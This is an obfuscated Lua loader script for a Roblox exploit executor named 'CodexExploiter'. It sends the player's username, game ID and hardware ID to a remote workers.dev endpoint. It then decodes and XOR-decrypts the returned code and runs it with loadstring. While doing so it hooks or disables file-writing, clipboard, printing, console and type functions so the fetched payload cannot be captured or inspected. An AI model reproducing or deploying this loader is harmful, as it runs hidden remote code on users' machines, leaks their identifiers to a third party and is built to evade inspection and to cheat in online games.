-- CodexExploiter by Unknown1337
local _C={}
_C._sb=string.byte _C._sc=string.char _C._ss=string.sub _C._sl=string.len
_C._sg=string.gsub _C._tc=table.concat _C._ls=loadstring _C._mf=math.floor
_C._bx=(bit32 and bit32.bxor) or (bit and bit.bxor) or function(a,b) local r,p=0,1 for i=0,7 do local x,y=a%2,b%2 if x~=y then r=r+p end a=(a-x)/2 b=(b-y)/2 p=p*2 end return r end
local _rq=request or http_request or (http and http.request)
if type(_rq)~="function" then pcall(function() game:GetService("StarterGui"):SetCore("SendNotification",{Title="CodexExploiter",Text="Executor not supported.",Duration=5}) end) return end
local _a1="02724b6ad01f553c" local _a2="4cb27186f5debae8" local _a3="5373bd81a3d06e1d" local _a4="1889ecc2e9653065"
local function _rv(s) local r={} for i=#s,1,-1 do r[#r+1]=_C._ss(s,i,i) end return _C._tc(r) end
local _ek=_rv(_a1).._rv(_a2).._rv(_a3).._rv(_a4)
_a1=nil _a2=nil _a3=nil _a4=nil
local _f1="75a940d709af2597c1d162c0b997e640ff7119db2f4a4272c83535ef0e4fb8a0"
local _pn="Unknown1337" pcall(function() _pn=game:GetService("Players").LocalPlayer.Name end)
local _pid="0" pcall(function() _pid=tostring(game.PlaceId) end)
local _rs=_rq({Url="https://persoloadstring.renern.workers.dev/raw/h3Mp88Jw",Method="POST",Headers={["LSH-Token"]="1773910971744.".._f1,["LSH-Auth"]="1773910971744." .. _ek,["LSH-HWID"]=(gethwid and gethwid()) or "",["LSH-User"]=_pn,["LSH-Game"]=_pid,["Content-Type"]="application/octet-stream",["Content-Length"]="0"},Body=""})
_f1=nil _pn=nil _rq=nil
if _rs.StatusCode==200 then
local _bl={} local _bc="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
for i=1,64 do _bl[_C._ss(_bc,i,i)]=i-1 end
local function _bd(d) d=_C._sg(d,'[^A-Za-z0-9+/=]','') local r,buf,bits={},0,0 for i=1,_C._sl(d) do local c=_C._ss(d,i,i) if c~='=' then buf=buf*64+(_bl[c] or 0) bits=bits+6 if bits>=8 then bits=bits-8 r[#r+1]=_C._sc(_C._mf(buf/(2^bits))%256) buf=buf%(2^bits) end end end return _C._tc(r) end
local _raw=_bd(_rs.Body)
_rs=nil
local _o={} for i=1,_C._sl(_raw) do local ki=((i-1)%_C._sl(_ek))+1 _o[i]=_C._sc(_C._bx(_C._sb(_raw,i),_C._sb(_ek,ki))) end
local _cd=_C._tc(_o) _raw=nil _o=nil _ek=nil
local _nop=function(...) end
local _hf=hookfunction or replaceclosure
local _res=restorefunction or restoreclosure

local _di=debug and debug.getinfo
if type(_di)=="function" then
    pcall(function() if _di(_C._ls).what~="C" then _C._ls=_nop end end)
    pcall(function() if load and _di(load).what~="C" then load=_nop end end)
    pcall(function() if _di(_hf).what~="C" then _hf=_nop end end)
end

if type(_res)=="function" then pcall(function() _res(_hf) end) pcall(function() _res(_C._ls) end) pcall(function() _res(writefile) end) pcall(function() _res(print) end) end
pcall(function() if debug and debug.getupvalues then for _,v in pairs(debug.getupvalues(_hf)) do if type(v)=="table" then for k in pairs(v) do pcall(function() v[k]=nil end) end end end end end)
local _rl={}
if type(_hf)=="function" then
local function _th(f) if type(f)=="function" then local ok,orig=pcall(_hf,f,_nop) if ok and orig and orig~=f then _rl[#_rl+1]={f,orig} end end end
pcall(function() _th(writefile) end) pcall(function() _th(appendfile) end) pcall(function() _th(setclipboard) end)
pcall(function() _th(print) end) pcall(function() _th(warn) end)
pcall(function() _th(rconsoleprint) end) pcall(function() _th(rconsoleoutput) end) pcall(function() _th(rconsoleinfo) end) pcall(function() _th(rconsolewarn) end) pcall(function() _th(rconsoleerr) end)
end
local _genv=(type(getgenv)=="function" and getgenv()) or getfenv(0)
local _gn={"writefile","appendfile","setclipboard","print","warn","rconsoleprint","rconsoleoutput","tostring"}
local _gs={} for _,k in ipairs(_gn) do pcall(function() _gs[k]=_genv[k] _genv[k]=_nop end) end
local _otype
pcall(function() if type(_hf)=="function" then _otype=_hf(type, function(s) if s==_cd then return "nil" end return _otype(s) end) end end)
local _fn, _er
local _ld = load or _C._ls
local _s1,_r1=pcall(function() return _C._ls(_cd) end)
if _s1 and type(_r1)=="function" then _fn=_r1 elseif _s1 then _er=_r1 end
pcall(function() if _otype then _hf(type, _otype) end end)
for k,v in pairs(_gs) do pcall(function() _genv[k]=v end) end
if type(_hf)=="function" then for _,r in ipairs(_rl) do pcall(function() _hf(r[1],r[2]) end) end end
_gs=nil _gn=nil _genv=nil _rl=nil _nop=nil _hf=nil _res=nil
_cd=nil _C=nil _bd=nil _bl=nil _bc=nil _otype=nil
if _fn then 
    task.spawn(function()
        local success, err = pcall(_fn)
        if not success then
             pcall(function() game:GetService("StarterGui"):SetCore("SendNotification",{Title="CodexExploiter",Text="Runtime Error by Unknown1337.",Duration=5}) end)
        end
    end)
    _fn=nil
else pcall(function() game:GetService("StarterGui"):SetCore("SendNotification",{Title="CodexExploiter",Text="Syntax Error by Unknown1337.",Duration=5}) end) end
else
local _msg=_rs.Body
if not _msg or _msg=="" or string.sub(_msg,1,9)=="<!DOCTYPE" then _msg="Status "..tostring(_rs.StatusCode) end
_msg=string.sub(_msg,1,100)
pcall(function() game:GetService("StarterGui"):SetCore("SendNotification",{Title="CodexExploiter by Unknown1337",Text="Failed to load.",Duration=5}) end)
end
